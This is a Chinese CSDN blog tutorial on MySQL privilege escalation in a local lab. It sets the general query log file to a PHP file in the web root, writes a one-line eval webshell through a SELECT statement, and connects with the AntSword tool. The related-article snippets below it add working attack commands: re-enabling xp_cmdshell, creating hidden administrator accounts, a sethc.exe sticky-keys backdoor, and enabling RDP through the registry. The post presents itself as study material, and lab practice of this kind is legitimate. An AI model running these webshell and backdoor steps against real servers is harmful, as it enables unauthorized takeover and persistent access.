数据库提权

最新推荐文章于 2024-11-14 19:29:09 发布
最新推荐文章于 2024-11-14 19:29:09 发布
阅读量600 收藏 6
点赞数 3
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52654869/article/details/138469990
版权
1.此时实验需要用到的软件:

1phpStudy该程序包集成最新的Apache+PHP+MySQL+ phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等.总之学习PHP只需一个包。

2)中国蚁剑,中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

2.首先要开启我们的phpStudy的服务

3.登录我们的phpmyadmin

这里简单的介绍一下phpmyadmin,它是一个以 PHP 为基础,以 Web-Base 方式架构在网站主机上的 MySQL 的数据库管理工具,让管理者可用 Web 接口管理 MySQL 数据库

4.利用MySQL日志导马
先开启全局日志:使用这条语句SET GLOBAL general_log = 'on'
5.查看通用查询日志

     使用这条语句:SHOW VARIABLES LIKE '%general%’

    当开启 general_log 时,所执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改     general_log_file 的值为一个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell

6.将指定日志写入网站的根目录

.利用这条语句:SET GLOBAL general_log_file = 'C:/phpStudy/www/hack.php'将指定日志写入到网站根目录的 hack.php 文件

7.执行SQL语句

SELECT '<?php eval($_POST["cmd"]);?>',即可将一句话木马写入 hack.php 文件中 访问/hack.php 成功写入

8.查看hack.php

发现这个木马文件的路径在这个位置 然后用中国蚁剑连接:

9.连接

首先先测试连接

发现测试成功后我们进行添加操作

10.打开虚拟终端

可以发现我们登录进来后的用户是administrator,同时也可以进行一些操作

注意该实验仅供网络安全方向的进行学习,严禁用于从事违法的行为!!!

[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及管理员(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
拿到GETSHELL之后的
weixin_69678131的博客
05-12 1766
getshell之后的
Linux通过反弹Shell实验
qq_59201520的博客
02-20 2305
通过反弹shell在Linux上的实验
mysql UDF 复现
m0_65096687的博客
05-12 687
去查看它的设置,发现设置为NULL,secure_file_priv为NULL是禁止导出文件的意思。我们得到数据库账号密码的方式有很多种,这里我们利用mysql数据库的特性,连接后,我们进入C:\phpStudy\MySQL\data\mysql\db.MYD。mysqlUDF的原理就是创建一个函数来调用系统命令,这里的复现是从已经得到了webshell开始的。udf就是将dll文件导入目录,然后执行sql语句创建一个可以执行系统命令的函数。因为这边我使用的是,所以直接上传文件。
mysql工具
04-24
mysql自动工具,。。。。。。。。。。。。。。。。。。。。。。。
Linux--第三方软件MYSQL数据库(WEB+本地)
金灰的博客
05-12 1046
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
MYSQL5.6免安装版本问题总结
心静、世界就静
07-02 983
MYSQL免安装教程配置 自行百度,好多教程都说修改配置文件,但是百度配置文件,给出答案都不统一,所以,自我体验一点就是其实没有必要去修改配置文件,5.6版本自带my-default.ini,下载安装包之后,直接进行解压,然后配置环境,将bin目录路径添加到环境变量中的path中,以管理员身份运行命令窗体进行安装即可,对于编码集设置,在我们创建数据库的时候可以直接指定。 遇到的问题如下: 1...
sqltools工具_MDAT一款用于数据库攻击的利用工具
weixin_39880479的博客
01-25 2839
介绍这是一款用于数据库攻击的利用工具,集合了多种主流的数据库类型。由团队成员Ch1ng & j1anFen 共同完成开发。前言由于各种数据库攻击利用工具需要各种环境导致使用相当不便,便萌生了开发此工具的想法,将常用的数据库集合在一起并且优化当时工具的一些不足。工具没有神仙技巧,都是网上现成的 POC 集合,更多的是开发时候对 JavaFx 的操控。功能Mysql传统UDF自适...
升 - MY & MS & ORA 等 SQL 数据库解析
m0_57836225的博客
11-14 615
MY(MySQL)数据库MySQL 是一款广泛使用的开源关系型数据库管理系统。当攻击者获得了一个低限的 MySQL 账号后,可能会尝试通过各种漏洞或不当配置来限,从而获取更高的数据库操作限,如获取管理员限以执行任意 SQL 语句、修改数据库结构、访问敏感数据等。MS(Microsoft SQL Server)数据库Microsoft SQL Server 在企业级应用中广泛使用。
1433工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第二步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
SQL综合利用工具 必备
06-13
SQL综合利用工具 必备
第60天:升-MY&MS&ORA等SQL数据库1
08-03
在网络安全和渗透测试中,升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行,以及涉及的相关知识点。 首先...
-MY&MS&ORA数据库
qi_SJQ_的博客
02-01 1665
数据库: 在利用系统溢出漏洞无果的情况下,可以采用数据库进行来获得系统限,不是数据库用户的限,但需要知道数据库的前条件:服务器开启数据库服务及获取到最高限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库的可能。 #数据库应用升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库限用户密码收集等方法 #目前数据库对应的技术及方法等 流程:服务探针->信息收集->利用->获取限 探针查看是否...
Linux与数据库
赤赤三的博客
03-20 730
Linux系统内核漏洞:(常见的就是系统内核 | 脏牛 | suid) 原理: linux内核版本的分类 Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字 第一个组数字:目前发布的内核主版本。 第二个组数字:偶数表示稳定版本;奇数表示开发中版本。 第三个组数字:错误修补的次数。 思路(利用linux系统漏洞进行,首先搜索linux系统漏洞,然后去github搜索Debian 5对应
第60天-升-MY&MS&ORA 等 SQL 数据库
MCTSOG的博客
05-04 744
思维导图 数据库 ​ 在利用系统溢出漏洞无果的情况下,可以采用数据库进行,但需要知道数据库的前条件:服务器开启数据库服务及获取到最高限用户密码。除 Access 数据库外,其他数据库基本都存在数据库的可能。 数据库应用升中的意义 WEB 或本地环境如何探针数据库应用 数据库限用户密码收集等方法 目前数据库对应的技术及方法等 知识点 流程 服务探针---->信息收集----->利用----->获取数据库端口号 关系型数
网络安全-渗透-查看数据库工具
Sumarua的博客
06-22 323
网络安全-渗透-查看数据库工具 文件已上传至☞:https://download.csdn.net/download/weixin_43510203/12543339
mysql数据库
m0_63197559的博客
04-10 1479
MySQL数据库学习总结
Windows:利用MSSQL数据库,Oracle数据库
qq_61553520的博客
05-30 1804
MSSQL数据库总结归纳:MSSQL数据库三种方式都是死的:固定得命令执行三种方式都是通过web限查看配置文件的方式获取到MSSQL数据库的账号密码,再进行的,MSSQL数据库是默认允许外链的,我们获得sa账户密码后,可以直接远程登录数据库。再数据库的SQL语句执行环境进行的。Oracle数据库的利用就很简单,工具梭哈即可。
windows 数据库
最新发布
01-19
### Windows系统中的操作 在Windows操作系统中,升()是指通过某些方法获得更高的限级别以便执行...然而,讨论具体的数据库技巧超出了当前上下文范围,并且涉及到更复杂的技术细节和道德考量。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值